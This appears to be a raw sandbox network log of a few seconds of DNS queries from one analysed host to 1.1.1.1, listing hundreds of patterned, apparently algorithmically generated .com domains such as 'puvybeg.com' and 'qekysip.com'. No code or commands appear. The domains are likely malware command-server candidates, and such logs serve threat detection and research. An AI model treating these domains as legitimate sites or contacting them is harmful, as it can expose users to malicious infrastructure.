                                                                                                                                                                                                            Sep 8, 2024 09:00:26.655461073 CEST192.168.2.41.1.1.10x48c5Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.655610085 CEST192.168.2.41.1.1.10xb14cStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.655761003 CEST192.168.2.41.1.1.10xd5e4Standard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.656230927 CEST192.168.2.41.1.1.10xaad8Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.656454086 CEST192.168.2.41.1.1.10x5e05Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.656922102 CEST192.168.2.41.1.1.10x2167Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.657182932 CEST192.168.2.41.1.1.10x664eStandard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.657347918 CEST192.168.2.41.1.1.10x4b75Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.657502890 CEST192.168.2.41.1.1.10xbc56Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.657893896 CEST192.168.2.41.1.1.10x2db3Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.676830053 CEST192.168.2.41.1.1.10x1009Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.683150053 CEST192.168.2.41.1.1.10x3542Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.683373928 CEST192.168.2.41.1.1.10x6d92Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.684688091 CEST192.168.2.41.1.1.10x234aStandard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.686446905 CEST192.168.2.41.1.1.10x870Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.686708927 CEST192.168.2.41.1.1.10xfba5Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.687016010 CEST192.168.2.41.1.1.10xc74fStandard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.687244892 CEST192.168.2.41.1.1.10x7861Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.687258005 CEST192.168.2.41.1.1.10xa746Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.695696115 CEST192.168.2.41.1.1.10xb1e4Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.699167967 CEST192.168.2.41.1.1.10xc4bbStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.701766014 CEST192.168.2.41.1.1.10x2628Standard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.715503931 CEST192.168.2.41.1.1.10x3553Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.716022015 CEST192.168.2.41.1.1.10x49c9Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.716999054 CEST192.168.2.41.1.1.10xabfcStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.717298985 CEST192.168.2.41.1.1.10x8f7fStandard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.717827082 CEST192.168.2.41.1.1.10x4166Standard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.718030930 CEST192.168.2.41.1.1.10xc51dStandard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.718224049 CEST192.168.2.41.1.1.10xf4c9Standard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735032082 CEST192.168.2.41.1.1.10x34aaStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735340118 CEST192.168.2.41.1.1.10xa60aStandard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735480070 CEST192.168.2.41.1.1.10xa752Standard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735691071 CEST192.168.2.41.1.1.10xfb75Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735889912 CEST192.168.2.41.1.1.10x14ceStandard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736342907 CEST192.168.2.41.1.1.10x88a9Standard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736438990 CEST192.168.2.41.1.1.10x4c09Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736637115 CEST192.168.2.41.1.1.10xb996Standard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736746073 CEST192.168.2.41.1.1.10x437dStandard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736947060 CEST192.168.2.41.1.1.10x368aStandard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736947060 CEST192.168.2.41.1.1.10xa239Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.737179995 CEST192.168.2.41.1.1.10x3ccbStandard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.737355947 CEST192.168.2.41.1.1.10x3d86Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.737540960 CEST192.168.2.41.1.1.10x98d7Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.741564989 CEST192.168.2.41.1.1.10x20adStandard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.741636038 CEST192.168.2.41.1.1.10x56c7Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.741815090 CEST192.168.2.41.1.1.10xbec2Standard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742003918 CEST192.168.2.41.1.1.10x1c33Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742161036 CEST192.168.2.41.1.1.10x4273Standard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742178917 CEST192.168.2.41.1.1.10x2eb5Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742369890 CEST192.168.2.41.1.1.10xcccbStandard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742635012 CEST192.168.2.41.1.1.10xdc3cStandard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742676973 CEST192.168.2.41.1.1.10x895fStandard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.743275881 CEST192.168.2.41.1.1.10xff18Standard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.623008013 CEST192.168.2.41.1.1.10x41d2Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.626430988 CEST192.168.2.41.1.1.10xf59dStandard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.628856897 CEST192.168.2.41.1.1.10xc25eStandard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.635159969 CEST192.168.2.41.1.1.10x6a1aStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.640708923 CEST192.168.2.41.1.1.10x4355Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.666471004 CEST192.168.2.41.1.1.10x379eStandard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.684571028 CEST192.168.2.41.1.1.10x286cStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.685777903 CEST192.168.2.41.1.1.10xee98Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.705532074 CEST192.168.2.41.1.1.10xb5b5Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.705928087 CEST192.168.2.41.1.1.10x4f7bStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.706367016 CEST192.168.2.41.1.1.10x29edStandard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.706991911 CEST192.168.2.41.1.1.10x497fStandard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.709281921 CEST192.168.2.41.1.1.10x5e0fStandard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.735200882 CEST192.168.2.41.1.1.10xa0cbStandard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.738208055 CEST192.168.2.41.1.1.10xab32Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.740416050 CEST192.168.2.41.1.1.10x1446Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.744962931 CEST192.168.2.41.1.1.10xc84cStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.747242928 CEST192.168.2.41.1.1.10x82b0Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.749761105 CEST192.168.2.41.1.1.10x14d2Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.750525951 CEST192.168.2.41.1.1.10x884bStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.751461983 CEST192.168.2.41.1.1.10x5247Standard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.759926081 CEST192.168.2.41.1.1.10x612fStandard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.760253906 CEST192.168.2.41.1.1.10x2d7fStandard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.760451078 CEST192.168.2.41.1.1.10xe9Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.760865927 CEST192.168.2.41.1.1.10x422Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.761293888 CEST192.168.2.41.1.1.10xe74Standard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.761553049 CEST192.168.2.41.1.1.10x4fd5Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670707941 CEST192.168.2.41.1.1.10xdb96Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.671252966 CEST192.168.2.41.1.1.10x97acStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.679363966 CEST192.168.2.41.1.1.10xf34bStandard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.682884932 CEST192.168.2.41.1.1.10xd5b4Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687446117 CEST192.168.2.41.1.1.10x2a1Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687484980 CEST192.168.2.41.1.1.10x77c1Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687681913 CEST192.168.2.41.1.1.10x1a2dStandard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.752739906 CEST192.168.2.41.1.1.10xc209Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.753673077 CEST192.168.2.41.1.1.10xf16dStandard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.754049063 CEST192.168.2.41.1.1.10xad4Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.754383087 CEST192.168.2.41.1.1.10x8610Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.754899979 CEST192.168.2.41.1.1.10xbda3Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.755299091 CEST192.168.2.41.1.1.10x448dStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.757661104 CEST192.168.2.41.1.1.10xc8d1Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.758240938 CEST192.168.2.41.1.1.10x4ce3Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.758469105 CEST192.168.2.41.1.1.10xea50Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.758831024 CEST192.168.2.41.1.1.10x62f5Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.807265997 CEST192.168.2.41.1.1.10x4d5fStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.809520006 CEST192.168.2.41.1.1.10xbc80Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.844377995 CEST192.168.2.41.1.1.10x876cStandard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.844692945 CEST192.168.2.41.1.1.10xfeaeStandard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.845185995 CEST192.168.2.41.1.1.10x6bb1Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.845737934 CEST192.168.2.41.1.1.10x273cStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.846316099 CEST192.168.2.41.1.1.10x54e1Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.889175892 CEST192.168.2.41.1.1.10x8e5cStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.889395952 CEST192.168.2.41.1.1.10x8b07Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890141010 CEST192.168.2.41.1.1.10x8cfdStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890355110 CEST192.168.2.41.1.1.10x2709Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890544891 CEST192.168.2.41.1.1.10xd2dcStandard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890707970 CEST192.168.2.41.1.1.10xaa28Standard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890830994 CEST192.168.2.41.1.1.10x7831Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.891057014 CEST192.168.2.41.1.1.10x7a77Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.891599894 CEST192.168.2.41.1.1.10x6378Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892011881 CEST192.168.2.41.1.1.10x1a69Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892046928 CEST192.168.2.41.1.1.10xaaf1Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892308950 CEST192.168.2.41.1.1.10x1a46Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892323971 CEST192.168.2.41.1.1.10xb9e4Standard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892570019 CEST192.168.2.41.1.1.10x8060Standard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892580986 CEST192.168.2.41.1.1.10x5036Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892821074 CEST192.168.2.41.1.1.10x1022Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892843962 CEST192.168.2.41.1.1.10xf053Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.893069029 CEST192.168.2.41.1.1.10xcb44Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.894666910 CEST192.168.2.41.1.1.10x8e7eStandard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.898313046 CEST192.168.2.41.1.1.10xc250Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.899979115 CEST192.168.2.41.1.1.10xc20bStandard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.900017977 CEST192.168.2.41.1.1.10x134Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.904356003 CEST192.168.2.41.1.1.10x2039Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.913439035 CEST192.168.2.41.1.1.10xe84bStandard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.922271967 CEST192.168.2.41.1.1.10xa522Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.397439957 CEST192.168.2.41.1.1.10x1ae9Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.408876896 CEST192.168.2.41.1.1.10x60e5Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.409567118 CEST192.168.2.41.1.1.10x8c11Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.409778118 CEST192.168.2.41.1.1.10x5dc9Standard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.410096884 CEST192.168.2.41.1.1.10xefceStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.411237001 CEST192.168.2.41.1.1.10x5b09Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.412486076 CEST192.168.2.41.1.1.10xad02Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.412837029 CEST192.168.2.41.1.1.10xf6eaStandard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413136959 CEST192.168.2.41.1.1.10x1f9cStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413275003 CEST192.168.2.41.1.1.10xe268Standard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413590908 CEST192.168.2.41.1.1.10x9f8eStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413721085 CEST192.168.2.41.1.1.10xfdf4Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414110899 CEST192.168.2.41.1.1.10x515bStandard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414172888 CEST192.168.2.41.1.1.10x81d6Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414628983 CEST192.168.2.41.1.1.10x687eStandard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414679050 CEST192.168.2.41.1.1.10x83e6Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.415478945 CEST192.168.2.41.1.1.10x9d5Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.415599108 CEST192.168.2.41.1.1.10xe3e7Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.416081905 CEST192.168.2.41.1.1.10x9a69Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.416321039 CEST192.168.2.41.1.1.10x88cfStandard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.416976929 CEST192.168.2.41.1.1.10x5c47Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.417054892 CEST192.168.2.41.1.1.10x9c79Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.417526960 CEST192.168.2.41.1.1.10x3073Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.418194056 CEST192.168.2.41.1.1.10xd0e7Standard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.418657064 CEST192.168.2.41.1.1.10x5c62Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.419297934 CEST192.168.2.41.1.1.10x4c34Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.420408010 CEST192.168.2.41.1.1.10x9facStandard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.422489882 CEST192.168.2.41.1.1.10x3defStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.423638105 CEST192.168.2.41.1.1.10xb230Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.433758974 CEST192.168.2.41.1.1.10xc324Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.434087038 CEST192.168.2.41.1.1.10xa360Standard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.437161922 CEST192.168.2.41.1.1.10x2572Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.453361034 CEST192.168.2.41.1.1.10x71e7Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.459084988 CEST192.168.2.41.1.1.10x231Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.473381042 CEST192.168.2.41.1.1.10xfde5Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.508884907 CEST192.168.2.41.1.1.10xa58aStandard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.509584904 CEST192.168.2.41.1.1.10x979fStandard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.742116928 CEST192.168.2.41.1.1.10x20dbStandard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.742784977 CEST192.168.2.41.1.1.10x535cStandard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.742966890 CEST192.168.2.41.1.1.10x5ab0Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.743180037 CEST192.168.2.41.1.1.10xcc3Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.743478060 CEST192.168.2.41.1.1.10x3843Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.744023085 CEST192.168.2.41.1.1.10x4414Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.744348049 CEST192.168.2.41.1.1.10x18b3Standard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.744944096 CEST192.168.2.41.1.1.10xfb7Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.767381907 CEST192.168.2.41.1.1.10xbc3dStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.767510891 CEST192.168.2.41.1.1.10xe88eStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.767792940 CEST192.168.2.41.1.1.10xb0cbStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768018961 CEST192.168.2.41.1.1.10xd0b6Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768217087 CEST192.168.2.41.1.1.10xbb8fStandard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768287897 CEST192.168.2.41.1.1.10x8269Standard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768491030 CEST192.168.2.41.1.1.10x3971Standard query (0)puvybuv.comA (IP address)IN (0x0001)false
